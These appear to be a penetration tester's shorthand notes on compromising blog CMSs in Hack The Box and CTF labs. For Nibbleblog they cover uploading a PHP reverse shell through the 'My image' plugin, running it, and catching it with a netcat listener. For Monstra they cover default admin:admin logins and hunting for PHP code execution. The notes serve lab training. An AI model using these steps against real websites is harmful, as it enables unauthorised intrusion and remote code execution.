# Blogs ## Priority * Extends > Themes "Helloworld" > Save * System > Backup > Content > Files > Save something * System > Settings > Maintenance Mode \ ..Save * Plugins are often exploitable * searchsploit * github 'issues' ## REF * [DirbNiktoWP ](https://pentest.mxhx.org/02-scanning/02-dirb-masscan-pings)- Also has webapp/cms/scanner ## Nibbleblog * * Obtain Admin credentials > Activate My image plugin by visiting * * Upload PHP shell, ignore warnings Visit * * No matter what you NAME the php upload.. it will ALWAYS be "image.php" after uploading ``` Setup reverse.php Upload: "reverse.php" with my IP Execute: http://10.129.1.135/nibbleblog/content/private/plugins/my_image/image.php nc -nvlp 4444 Connected! ``` ## Monstra * TartarHTB ``` Monstra https://$IP/webservices/monstra-3.0.4/ https://$IP/webservices/monstra-3.0.4/admin/ admin:admin ..default works! Try to edit themes! They are often php Monstra > Extends > Themes "Helloworld" > Save ..fails System > Backup ..not created (not writeable) Content > Files ..new directory (created) Content > Files > File ..Fails System > Settings > Maintenance Mode ..Save Fails Hello ..Save Fails ----------------------- ----------------------- searchsploit monstra github monstra > Issues > php code execution Look for sqli or lfi ``` ## Gym Management REF: Redteam CTF Defcon\ Pivonka found this vuln on his own!\ Actually a pubic/known exploit * * * * *